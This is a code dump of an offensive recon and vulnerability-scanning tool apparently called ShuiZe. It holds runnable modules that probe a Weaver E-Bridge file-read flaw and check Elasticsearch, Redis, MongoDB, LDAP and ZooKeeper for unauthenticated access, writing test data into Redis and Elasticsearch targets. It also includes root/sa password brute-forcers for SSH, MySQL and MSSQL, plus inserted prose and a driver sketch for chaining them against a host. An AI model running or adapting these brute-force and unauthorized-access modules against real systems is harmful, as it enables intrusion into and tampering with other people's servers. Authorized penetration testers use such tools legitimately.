49 | except Exception as e:
50 | return False
51 |
52 | # Weaver E-Bridge 2018/2019 arbitrary file read
53 | def bridgeRead(self):
54 | bridgeRead_url = self.url + '/wxjsapi/saveYZJFile'
55 | try:
56 | res = requests.get(url=bridgeRead_url, headers=self.headers, proxies=self.proxies, verify=False, allow_redirects=False)
57 | if res.status_code == 200:
58 | self.isExist = True
59 | tqdm.write(Fore.RED + '[泛微E-Bridge 任意文件读取] {}'.format(self.url))
60 | self.vul_list.append(['泛微E-Bridge 任意文件读取', self.url, 'Yes {}'.format(bridgeRead_url)])
61 | except Exception as e:
62 | return False
63 |
64 |
65 |
66 | if __name__ == '__main__':
67 | from queue import Queue
68 |
69 | vul_list = []
70 | # proxy = r'192.168.168.148:10086'
71 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
72 | requests_proxies = None
73 | url = r'http://www.domain.com'
74 | Detect(url, vul_list, requests_proxies).run_detect()
75 |
76 | tqdm.write(Fore.BLACK + '-' * 50 + '结果 ' + '-' * 50)
77 | for vul in vul_list:
78 | tqdm.write(Fore.BLACK + str(vul))
79 |
80 |
--------------------------------------------------------------------------------
/Plugins/Vul/CMS/qizhi.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | from tqdm import *
6 | from colorama import Fore
7 |
8 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
9 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
10 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
11 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
12 |
13 |
14 | # Qizhi bastion host
15 | class Detect(threading.Thread):
16 | name = '齐治堡垒机'
17 |
18 | def __init__(self, url, vul_list, requests_proxies):
19 | threading.Thread.__init__(self)
20 | self.url = url
21 | self.vul_list = vul_list # stores the vulnerability names and urls
22 | self.proxies = requests_proxies # proxies
23 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
24 | self.isExist = False # whether this url is vulnerable; defaults to False and is set to True once a vulnerability is found
25 |
26 | # Invoke the individual vulnerability checks
27 | def run_detect(self):
28 | return False
29 |
30 |
31 | if __name__ == '__main__':
32 | from queue import Queue
33 |
34 | vul_list = []
35 | # proxy = r'192.168.168.148:10086'
36 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
37 | requests_proxies = None
38 | url = r'http://www.domain.com'
39 | Detect(url, vul_list, requests_proxies).run_detect()
40 |
41 | tqdm.write(Fore.BLACK + '-' * 50 + '结果' + '-' * 50)
42 | for vul in vul_list:
43 | tqdm.write(Fore.BLACK + str(vul))
44 |
45 |
--------------------------------------------------------------------------------
/Plugins/Vul/Nuclei/NucleiApi.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import os
3 | import configparser
4 | import json
5 |
6 | cf = configparser.ConfigParser()
7 | cf.read("./iniFile/config.ini")
8 | secs = cf.sections()
9 | nuclei_config = cf.get('nuclei config', 'nuclei_config')
10 |
11 | def getCurrent_time():
12 | current_time = str(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')).replace(' ', '-').replace(':', '-')
13 | return current_time
14 |
15 | def run_nuclei(alive_Web):
16 | nucleiVul_list = []
17 |
18 | nucleiFolder = "./Plugins/Vul/Nuclei"
19 |
20 | # Folder that stores the nuclei results
21 | nucleiResult_folder = "{}/nucleiResult/{}".format(nucleiFolder, getCurrent_time())
22 | os.makedirs(nucleiResult_folder)
23 |
24 | # Write the urls from alive_Web to a file
25 | urlFilePath = nucleiResult_folder + "/url.txt"
26 | with open(urlFilePath, 'at', encoding='utf-8') as f:
27 | for url in alive_Web:
28 | f.writelines("{}\n".format(url))
29 |
30 | # Path of the file that stores the nuclei results
31 | nucleiResultPath = nucleiResult_folder + "/nucleiResult.txt"
32 |
33 | # Make the nuclei binary executable
34 | os.system('chmod 777 {}/nuclei'.format(nucleiFolder))
35 |
36 | # Update the nuclei templates
37 | nucleiUpdateCMD = '{}/nuclei -ud {}/nuclei-templates/'.format(nucleiFolder, nucleiFolder)
38 | print("[更新nuclei-template] : {}".format(nucleiUpdateCMD))
39 | os.system(nucleiUpdateCMD)
40 |
41 | # Run nuclei to detect vulnerabilities
42 | nucleiCMD = '{}/nuclei -l {} {} -json -o {}'.format(nucleiFolder, urlFilePath, nuclei_config, nucleiResultPath)
43 | print("[nucleiCMD] : {}".format(nucleiCMD))
44 | os.system(nucleiCMD)
45 |
46 | # nucleiResultPath = "Plugins/Vul/Nuclei/nucleiResult/2022-04-16-18-34-09/nucleiResult.txt"
47 | # Parse the nuclei results
48 | with open(nucleiResultPath, 'rt', encoding='utf-8') as f:
49 | for eachLine in f.readlines():
50 | eachLine = eachLine.strip()
51 | nucleiResult = json.loads(eachLine)
52 | url, vulName, templateId, severity, currentTime = nucleiResult["host"], nucleiResult["info"]["name"], \
53 | nucleiResult["template-id"], nucleiResult["info"][
54 | "severity"], nucleiResult["timestamp"]
55 | print(url, vulName, templateId, severity, currentTime)
56 | nucleiVul_list.append([vulName, url, templateId])
57 |
58 | return nucleiVul_list
59 |
60 |
61 | if __name__ == '__main__':
62 | alive_Web = ['']
63 | run_nuclei(alive_Web)
--------------------------------------------------------------------------------
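run_nuclei reads the nuclei_config option from the [nuclei config] section of iniFile/config.ini and splices it into the command line between -l <url file> and -json -o <result file>, so the option simply carries extra nuclei flags. A hedged illustration of such a section and of how it is consumed (the flags below are examples, not the values shipped in the repo's config.ini):

import configparser

# Example only: the real iniFile/config.ini may define different flags.
example_ini = """
[nuclei config]
nuclei_config = -severity critical,high -rate-limit 100
"""

cf = configparser.ConfigParser()
cf.read_string(example_ini)
extra_flags = cf.get('nuclei config', 'nuclei_config')
# run_nuclei() then builds: ./nuclei -l url.txt <extra_flags> -json -o nucleiResult.txt
print(extra_flags)
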
/Plugins/Vul/Nuclei/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Nuclei/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/Nuclei/nuclei:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Nuclei/nuclei
--------------------------------------------------------------------------------
/Plugins/Vul/ObserverWard/ObserverWardApi.py:
--------------------------------------------------------------------------------
1 | import datetime
2 | import os
3 | import json
4 |
5 | def getCurrent_time():
6 | current_time = str(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')).replace(' ', '-').replace(':', '-')
7 | return current_time
8 |
9 | def run_observerWard(alive_Web):
10 | observerWardVul_list = []
11 |
12 | observerWardFolder = "./Plugins/Vul/ObserverWard"
13 |
14 | # Folder that stores the observer_ward results
15 | observerWardResult_folder = "{}/observerWardResult/{}".format(observerWardFolder, getCurrent_time())
16 | os.makedirs(observerWardResult_folder)
17 |
18 | # Write the urls from alive_Web to a file
19 | urlFilePath = observerWardResult_folder + "/url.txt"
20 | with open(urlFilePath, 'at', encoding='utf-8') as f:
21 | for url in alive_Web:
22 | f.writelines("{}\n".format(url))
23 |
24 | # Path of the file that stores the observer_ward results
25 | observerWardResultPath = observerWardResult_folder + "/observerWardResult.json"
26 |
27 | # Make the observer_ward binary executable
28 | os.system('chmod 777 {}/observer_ward'.format(observerWardFolder))
29 |
30 | # Update the observer_ward fingerprint database
31 | observerWardUpdateCMD = '{}/observer_ward --update_fingerprint'.format(observerWardFolder)
32 | print("[更新observerWard指纹库] : {}".format(observerWardUpdateCMD))
33 | os.system(observerWardUpdateCMD)
34 |
35 | # Run observer_ward fingerprint detection
36 | observerWardCMD = '{}/observer_ward -f {} -j {}'.format(observerWardFolder, urlFilePath, observerWardResultPath)
37 | print("[observerWardCMD] : {}".format(observerWardCMD))
38 | os.system(observerWardCMD)
39 |
40 | # observerWardResultPath = "../../../test/1.json"
41 | # Parse the observer_ward results
42 | with open(observerWardResultPath, 'rt', encoding='utf-8') as f:
43 | text = f.read()
44 | if text:
45 | for each in json.loads(text):
46 | url, vulName = each["url"], each["name"]
47 | if vulName:
48 | # print(url, vulName)
49 | observerWardVul_list.append([str(vulName), url, 'Yes'])
50 |
51 | return observerWardVul_list
52 |
53 | if __name__ == '__main__':
54 | alive_Web = ['']
55 | run_observerWard(alive_Web)
--------------------------------------------------------------------------------
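run_observerWard only relies on the "url" and "name" fields of each record in the JSON file written by observer_ward, keeping entries whose fingerprint list is non-empty. A minimal sketch of that parsing step against a hand-written record (the sample data is illustrative, not real observer_ward output):

import json

# Only the "url" and "name" keys matter to run_observerWard(); everything else is ignored.
# "name" is assumed to be a list of matched fingerprints, hence the str() cast in the plugin.
sample = '[{"url": "http://example.com", "name": ["nginx", "thinkphp"]}, {"url": "http://example.org", "name": []}]'

observerWardVul_list = []
for each in json.loads(sample):
    url, vulName = each["url"], each["name"]
    if vulName:  # skip targets with no matched fingerprints
        observerWardVul_list.append([str(vulName), url, 'Yes'])

print(observerWardVul_list)
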
/Plugins/Vul/ObserverWard/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/ObserverWard/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/ObserverWard/observer_ward:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/ObserverWard/observer_ward
--------------------------------------------------------------------------------
/Plugins/Vul/Param/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Param/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/Service/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0x727/ShuiZe_0x727/4faed5a40cc866ed9a75cb9cd32c8427bf070734/Plugins/Vul/Service/__init__.py
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthElastic.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from elasticsearch import Elasticsearch
3 | from termcolor import cprint
4 | import re
5 |
6 | # Elasticsearch unauthorized-access detection
7 | class Detect():
8 | name = 'elastic'
9 |
10 | def __init__(self, ip, port, vul_list):
11 | self.ip = ip
12 | self.port = port
13 | self.vul_list = vul_list # stores the vulnerability names and urls
14 |
15 | # Only the code below needs to be changed
16 | def run_detect(self, weakPwdsList):
17 | # print('test elastic : {} {}'.format(self.ip, self.port))
18 | try:
19 | es = Elasticsearch("{}:{}".format(self.ip, self.port), timeout=20) # connect to Elasticsearch with a 20-second timeout
20 | es.indices.create(index='unauth_text')
21 | print('[+] connect to :{}'.format(self.ip))
22 | print('[+] {} -> Successful creation of a unauth_text node'.format(self.ip))
23 | es.index(index="unauth_text", doc_type="test-type", id=2, body={"text": "text"})
24 | print('[+] {} -> Successfully insert data into node unauth_text'.format(self.ip))
25 | ret = es.get(index="unauth_text", doc_type="test-type", id=2)
26 | print('[+] {} -> Successful acquisition of node unauth_text data : {}'.format(self.ip, ret))
27 | es.indices.delete(index='unauth_text')
28 | print('[+] {} -> Clear test node unauth_text data'.format(self.ip))
29 |
30 |
31 | host = '{}:{}'.format(self.ip, self.port)
32 | try:
33 | print('[+] {} -> Trying to get node information:↓'.format(self.ip))
34 | text = es.cat.indices()
35 | nodes = re.findall(r'open ([^ ]*) ', text)
36 | cprint('[ok] -> [{}] {}:{} -> : {}'.format(self.name, self.ip, self.port, nodes), 'red')
37 | host = '{} {}'.format(host, nodes)
38 | except Exception:
39 | cprint('[ok] -> [{}] {}:{}'.format(self.name, self.ip, self.port), 'red')
40 |
41 | self.vul_list.append([self.name, host, 'Yes'])
42 |
43 | except Exception as e:
44 | print(e.args)
45 |
46 |
47 | if __name__ == '__main__':
48 | ip = r'ip'
49 | port = 0000
50 | vul_list = []
51 | Detect(ip, port, vul_list).run_detect([])
52 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthLdaps.py:
--------------------------------------------------------------------------------
1 | import ldap3
2 | from termcolor import cprint
3 |
4 | # LDAPS unauthorized-access detection
5 | class Detect():
6 | name = 'ldaps'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # stores the vulnerability names and urls
12 |
13 | # Only the code below needs to be changed
14 | def run_detect(self, weakPwdsList):
15 | # print('test ldaps : {}:389'.format(self.ip))
16 | try:
17 | server = ldap3.Server(host=self.ip, port=389, allowed_referral_hosts=[('*', False)], get_info=ldap3.ALL,
18 | connect_timeout=30) # always use port 389: the discovered port is usually 636 (LDAPS), but exploitation goes over 389
19 | conn = ldap3.Connection(server, auto_bind=True)
20 | if len(server.info.naming_contexts) > 0:
21 | for _ in server.info.naming_contexts:
22 | if conn.search(_, '(objectClass=inetOrgPerson)'):
23 | naming_contexts = _.encode('utf8')
24 | # print naming_contexts
25 | cprint('[ok] -> [{}] {} : {}'.format(self.name, self.ip, naming_contexts), 'red')
26 | self.vul_list.append([self.name, '{}:389 {}'.format(self.ip, naming_contexts), 'Yes'])
27 | break
28 | except Exception as e:
29 | pass
30 |
31 | if __name__ == '__main__':
32 | ip = r'ip'
33 | port = 0000
34 | vul_list = []
35 | Detect(ip, port, vul_list).run_detect([])
36 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthMongodb.py:
--------------------------------------------------------------------------------
1 | from pymongo import MongoClient
2 | from termcolor import cprint
3 |
4 | # MongoDB unauthorized-access detection
5 | class Detect():
6 | name = 'mongodb'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # stores the vulnerability names and urls
12 |
13 | # Only the code below needs to be changed
14 | def run_detect(self, weakPwdsList):
15 | # print('test mongodb : {} {}'.format(self.ip, self.port))
16 | try:
17 | conn = MongoClient(self.ip, self.port, socketTimeoutMS=5000) # connect to MongoDB with a 5-second socket timeout
18 | dbs = conn.database_names()
19 | conn.close()
20 | cprint('[ok] -> [{}] {}:{} database_names:{}'.format(self.name, self.ip, self.port, dbs), 'red')
21 | self.vul_list.append([self.name, '{}:{} {}'.format(self.ip, self.port, dbs), 'Yes'])
22 | except Exception as e:
23 | # print(e.args)
24 | pass
25 |
26 | if __name__ == '__main__':
27 | ip = r'ip'
28 | port = 0000
29 | vul_list = []
30 | Detect(ip, port, vul_list).run_detect([])
31 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthRedis.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import redis
3 | from termcolor import cprint
4 |
5 | # Redis unauthorized-access detection
6 | class Detect():
7 | name = 'redis'
8 |
9 | def __init__(self, ip, port, vul_list):
10 | self.ip = ip
11 | self.port = port
12 | self.vul_list = vul_list # stores the vulnerability names and urls
13 |
14 | # Only the code below needs to be changed
15 | def run_detect(self, weakPwdsList):
16 | # print('test redis : {} {}'.format(self.ip, self.port))
17 | try:
18 | r = redis.Redis(host=self.ip, port=self.port, socket_timeout=20)
19 | r.set('name', 'test')
20 | if r.get('name'):
21 | cprint('[ok] -> [{}] {}:{}'.format(self.name, self.ip, self.port), 'red')
22 | self.vul_list.append([self.name, '{}:{}'.format(self.ip, self.port), 'Yes'])
23 | else:
24 | print('[error] -> {}:{}'.format(self.ip, self.port))
25 | except Exception as e:
26 | print(e.args)
27 |
28 | if __name__ == '__main__':
29 | ip = r'ip'
30 | port = 0000
31 | vul_list = []
32 | Detect(ip, port, vul_list).run_detect([])
33 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/unAuthZookeeper.py:
--------------------------------------------------------------------------------
1 | from kazoo.client import KazooClient
2 | from termcolor import cprint
3 |
4 | # ZooKeeper unauthorized-access detection
5 | class Detect():
6 | name = 'zookeeper'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # stores the vulnerability names and urls
12 |
13 | # Only the code below needs to be changed
14 | def run_detect(self, weakPwdsList):
15 | # print('test zookeeper : {}:{}'.format(self.ip, self.port))
16 | try:
17 | zk = KazooClient(hosts='{}:{}'.format(self.ip, self.port))
18 | zk.start()
19 | children = zk.get_children('/')
20 | if len(children) > 0:
21 | cprint('[ok] -> [{}] {}:{} {}'.format(self.name, self.ip, self.port, children), 'red')
22 | self.vul_list.append([self.name, '{}:{} {}'.format(self.ip, self.port, children), 'Yes'])
23 | zk.stop()
24 | except Exception as e:
25 | pass
26 |
27 | if __name__ == '__main__':
28 | ip = r'ip'
29 | port = 0000
30 | vul_list = []
31 | Detect(ip, port, vul_list).run_detect([])
32 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/weakMSSQL.py:
--------------------------------------------------------------------------------
1 | import pymssql
2 | from termcolor import cprint
3 |
4 | # MSSQL weak-password brute force
5 | class Detect():
6 | name = 'mssql'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # stores the vulnerability names and urls
12 |
13 | # Only the code below needs to be changed
14 | def run_detect(self, weakPwdsList):
15 | user = 'sa'
16 | database = 'master'
17 |
18 | for password in weakPwdsList:
19 | password = password.strip()
20 | try:
21 | # tds_version='7.0' must be set, otherwise the connection raises an error
22 | conn = pymssql.connect(host=self.ip, user=user, password=password, database=database, charset='utf8', tds_version='7.0')
23 | conn.close()
24 | cprint('[+] [{}] [{}] [sa:{}] successful!'.format(self.name, self.ip, password), 'red')
25 | self.vul_list.append([self.name, self.ip, 'Yes [{}:{}]'.format(user, password)])
26 | break
27 | except pymssql.OperationalError as e:
28 | if '18456' in str(e.args):
29 | print('[-] [{}] [sa:{}] mssql password error'.format(self.ip, password))
30 | elif '20009' in str(e.args):
31 | cprint('[Fail] [{}] not open mssql service'.format(self.ip), 'cyan')
32 | break
33 | except Exception as e:
34 | pass
35 |
36 | '''
37 | # wrong username or password
38 | pymssql.OperationalError: (18456, b"\xe7\x94\xa8\xe6\x88\xb7 'sa' \xe7\x99\xbb\xe5\xbd\x95\xe5\xa4\xb1\xe8\xb4\xa5\xe3\x80\x82DB-Lib error message 18456, severity 14:\nGeneral SQL Server error: Check messages from the SQL Server\nDB-Lib error message 20002, severity 9:\nAdaptive Server connection failed\n")
39 | # MSSQL service not running
40 | pymssql.OperationalError: (20009, b'DB-Lib error message 20009, severity 9:\nUnable to connect: Adaptive Server is unavailable or does not exist\nNet-Lib error during Connection refused (61)\n')
41 | '''
42 |
43 |
44 | if __name__ == '__main__':
45 | ip = r'ip'
46 | port = 0000
47 | vul_list = []
48 | Detect(ip, port, vul_list).run_detect([])
49 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/weakMYSQL.py:
--------------------------------------------------------------------------------
1 | import pymysql
2 | from termcolor import cprint
3 |
4 |
5 | # MySQL weak-password brute force
6 | class Detect():
7 | name = 'mysql'
8 |
9 | def __init__(self, ip, port, vul_list):
10 | self.ip = ip
11 | self.port = port
12 | self.vul_list = vul_list # stores the vulnerability names and urls
13 |
14 | # Only the code below needs to be changed
15 | def run_detect(self, weakPwdsList):
16 | user = 'root'
17 | for password in weakPwdsList:
18 | password = password.strip()
19 | try:
20 | # Connect to the database
21 | connect = pymysql.Connect(host=self.ip, port=self.port, user=user, passwd=password, charset='utf8')
22 | connect.close()
23 | cprint('[+] [{}] [{}] [root:{}] successful!'.format(self.name, self.ip, password), 'red')
24 | self.vul_list.append([self.name, self.ip, 'Yes [{}:{}]'.format(user, password)])
25 | break
26 | except pymysql.OperationalError as e:
27 | if 'Access denied for user ' in str(e.args):
28 | print('[-] [{}] [root:{}] mysql password error'.format(self.ip, password))
29 | elif "Can't connect to MySQL server" in str(e.args):
30 | cprint('[Fail] [{}] not open mysql service'.format(self.ip), 'cyan')
31 | break
32 | except Exception as e:
33 | pass
34 |
35 | '''
36 | # wrong username or password
37 | pymysql.err.OperationalError: (1045, "Access denied for user 'root'@'172.18.82.177' (using password: YES)")
38 |
39 | # MySQL service not running
40 | pymysql.err.OperationalError: (2003, "Can't connect to MySQL server on '172.18.89.21' ([Errno 61] Connection refused)")
41 | '''
42 |
43 | if __name__ == '__main__':
44 | ip = r'ip'
45 | port = 0000
46 | vul_list = []
47 | Detect(ip, port, vul_list).run_detect([])
48 | print(vul_list)
--------------------------------------------------------------------------------
/Plugins/Vul/Service/weakSSH.py:
--------------------------------------------------------------------------------
1 | import paramiko
2 | from termcolor import cprint
3 |
4 | # SSH weak-password brute force
5 | class Detect():
6 | name = 'ssh'
7 |
8 | def __init__(self, ip, port, vul_list):
9 | self.ip = ip
10 | self.port = port
11 | self.vul_list = vul_list # stores the vulnerability names and urls
12 |
13 | # Only the code below needs to be changed
14 | def run_detect(self, weakPwdsList):
15 | username = 'root'
16 |
17 | # Create an SSH client used to connect to the server
18 | ssh = paramiko.SSHClient()
19 | # Create a host-key policy that automatically trusts unknown hosts
20 | know_host = paramiko.AutoAddPolicy()
21 | # Load that policy
22 | ssh.set_missing_host_key_policy(know_host)
23 |
24 | for password in weakPwdsList:
25 | password = password.strip()
26 | try:
27 | # Connect to the server
28 | ssh.connect(
29 | hostname=self.ip,
30 | port=self.port,
31 | username=username,
32 | password=password
33 | )
34 | cprint('[+] [{}] [{}] [root:{}] successful!'.format(self.name, self.ip, password), 'red')
35 | self.vul_list.append([self.name, self.ip, 'Yes [{}:{}]'.format(username, password)])
36 | ssh.close()
37 | break
38 | except paramiko.ssh_exception.AuthenticationException as e:
39 | print('[-] [{}] [root:{}] ssh password error'.format(self.ip, password))
40 | except paramiko.ssh_exception.NoValidConnectionsError as e:
41 | cprint('[Fail] [{}] not open ssh service'.format(self.ip), 'cyan')
42 | break
43 | except paramiko.ssh_exception.SSHException as e:
44 | pass
45 | except Exception as e:
46 | pass
47 |
48 | if __name__ == '__main__':
49 | ip = r'ip'
50 | port = 0000
51 | vul_list = []
52 | Detect(ip, port, vul_list).run_detect([])
53 | print(vul_list)
--------------------------------------------------------------------------------
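All of the Service plugins above expose the same interface: Detect(ip, port, vul_list) plus run_detect(weakPwdsList), with the brute-force modules drawing their password candidates from the dictionaries under iniFile/PwdTxt/. A minimal driver sketch under those assumptions (the default ports and the scheduling shown here are illustrative; how ShuiZe.py actually dispatches these plugins may differ):

# Hedged sketch of driving the Service plugins from the repo root; not ShuiZe.py's actual scheduler.
from Plugins.Vul.Service import weakSSH, weakMYSQL, unAuthRedis

def check_host(ip):
    vul_list = []  # shared result list, same shape as in the plugins: [name, target, detail]

    # Brute-force plugins take a password list, e.g. iniFile/PwdTxt/dic_password_ssh.txt
    with open('iniFile/PwdTxt/dic_password_ssh.txt', 'rt', encoding='utf-8') as f:
        weakSSH.Detect(ip, 22, vul_list).run_detect(f.readlines())

    with open('iniFile/PwdTxt/dic_password_mysql.txt', 'rt', encoding='utf-8') as f:
        weakMYSQL.Detect(ip, 3306, vul_list).run_detect(f.readlines())

    # Unauth plugins ignore the password list, so an empty list is enough
    unAuthRedis.Detect(ip, 6379, vul_list).run_detect([])

    return vul_list

if __name__ == '__main__':
    print(check_host('127.0.0.1'))
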
/Plugins/Vul/Web/FineReport.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | import hashlib
6 | from tqdm import *
7 | from colorama import Fore
8 | import urllib3
9 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
10 |
11 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
12 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
13 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
14 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
15 |
16 |
17 |
18 | # FineReport
19 | class Detect(threading.Thread):
20 | name = 'FineReport'
21 |
22 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
23 | threading.Thread.__init__(self)
24 | self.alive_Web_queue = alive_Web_queue # queue of live web targets
25 | self.pbar = pbar # progress bar
26 | self.vul_list = vul_list # stores the vulnerability names and urls
27 | self.proxies = requests_proxies # proxies
28 | self.headers = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
29 |
30 | def run(self):
31 | while not self.alive_Web_queue.empty():
32 | alive_web = self.alive_Web_queue.get()
33 | self.pbar.set_postfix(url=alive_web, vul=self.name) # progress bar display
34 | self.run_detect(alive_web.rstrip('/'))
35 | self.pbar.update(1) # advance the progress bar by one for each finished task
36 | self.alive_Web_queue.task_done()
37 |
38 | # Invoke the individual vulnerability checks
39 | def run_detect(self, url):
40 | self.check(url)
41 |
42 | def check(self, url):
43 | FineReport_url = url + '/WebReport/ReportServer'
44 | try:
45 | res = requests.get(url=FineReport_url, headers=self.headers, proxies=self.proxies, verify=False, timeout=10)
46 | text = res.text
47 | if 'FineReport--Web Reporting Tool' in text:
48 | tqdm.write(Fore.RED + '[{}] {}'.format('FineReport', url))
49 | self.vul_list.append(['FineReport', url, 'YES'])
50 | return True
51 | else:
52 | return False
53 | except Exception as e:
54 | return False
55 |
56 |
57 | if __name__ == '__main__':
58 | from queue import Queue
59 |
60 | alive_web = ['']
61 | vul_list = []
62 | # proxy = r''
63 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
64 | requests_proxies = None
65 | alive_Web_queue = Queue(-1) # put the live web targets into the queue
66 | for _ in alive_web:
67 | alive_Web_queue.put(_)
68 |
69 | threads = []
70 | thread_num = 1 # number of vulnerability-detection threads
71 |
72 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total is the overall count
73 |
74 | for num in range(1, thread_num + 1):
75 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # instantiate the detection class, passing the queue of live webs and the list that stores vulnerabilities
76 | threads.append(t)
77 | t.start()
78 | for t in threads:
79 | t.join()
80 |
81 | pbar.close() # close the progress bar
82 |
83 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
84 | for vul in vul_list:
85 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
/Plugins/Vul/Web/IBM.py:
--------------------------------------------------------------------------------
1 | from termcolor import cprint
2 | import requests
3 | import threading
4 | import re
5 | import hashlib
6 | from tqdm import *
7 | from colorama import Fore
8 |
9 | # Print everything with tqdm.write(url): output appears above the progress bar and the bar shifts down one line.
10 | # Likely-vulnerable findings need red; printing with tqdm.write(Fore.RED + url) gives colored output.
11 | # Errors should be printed in grey with tqdm.write(Fore.WHITE + url)
12 | # Vulnerability results are printed with tqdm.write(Fore.BLACK + url)
13 |
14 |
15 |
16 | # IBM
17 | class Detect(threading.Thread):
18 | name = 'IBM'
19 |
20 | def __init__(self, alive_Web_queue, pbar, vul_list, requests_proxies):
21 | threading.Thread.__init__(self)
22 | self.alive_Web_queue = alive_Web_queue # queue of live web targets
23 | self.pbar = pbar # progress bar
24 | self.vul_list = vul_list # stores the vulnerability names and urls
25 | self.proxies = requests_proxies # proxies
26 | self.headers = {
27 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36"}
28 |
29 | def run(self):
30 | while not self.alive_Web_queue.empty():
31 | alive_web = self.alive_Web_queue.get()
32 | self.pbar.set_postfix(url=alive_web, vul=self.name) # progress bar display
33 | self.run_detect(alive_web.rstrip('/'))
34 | self.pbar.update(1) # advance the progress bar by one for each finished task
35 | self.alive_Web_queue.task_done()
36 |
37 |
38 | # Invoke the individual vulnerability checks
39 | def run_detect(self, url):
40 | # Check whether the target is IBM
41 | if self.check(url):
42 | pass
43 |
44 |
45 | def check(self, url):
46 | ico_url = url + '/images/ihs/favicon.ico'
47 | m1 = hashlib.md5()
48 | try:
49 | m1.update(requests.get(url=ico_url, headers=self.headers, proxies=self.proxies, timeout=20, verify=False,
50 | allow_redirects=False).content)
51 | the_md5 = m1.hexdigest()
52 | # print(the_md5)
53 | if the_md5 == 'd8ba35521dfc638f134cf3a64d1a6875':
54 | tqdm.write(Fore.RED + '[{}] {}'.format('IBM', url))
55 | self.vul_list.append(['IBM', url, 'Maybe'])
56 | return True
57 | else:
58 | return False
59 | except Exception as e:
60 | return False
61 |
62 |
63 |
64 | if __name__ == '__main__':
65 | from queue import Queue
66 |
67 | alive_web = ['']
68 | vul_list = []
69 | # proxy = r''
70 | # requests_proxies = {"http": "socks5://{}".format(proxy), "https": "socks5://{}".format(proxy)}
71 | requests_proxies = None
72 | alive_Web_queue = Queue(-1) # put the live web targets into the queue
73 | for _ in alive_web:
74 | alive_Web_queue.put(_)
75 |
76 | threads = []
77 | thread_num = 1 # number of vulnerability-detection threads
78 |
79 | pbar = tqdm(total=alive_Web_queue.qsize(), desc="检测漏洞", ncols=150) # total is the overall count
80 |
81 | for num in range(1, thread_num + 1):
82 | t = Detect(alive_Web_queue, pbar, vul_list, requests_proxies) # instantiate the detection class, passing the queue of live webs and the list that stores vulnerabilities
83 | threads.append(t)
84 | t.start()
85 | for t in threads:
86 | t.join()
87 |
88 | tqdm.write(Fore.BLACK + '-'*50 + '结果' + '-'*50)
89 | for vul in vul_list:
90 | tqdm.write(Fore.BLACK + str(vul))
--------------------------------------------------------------------------------
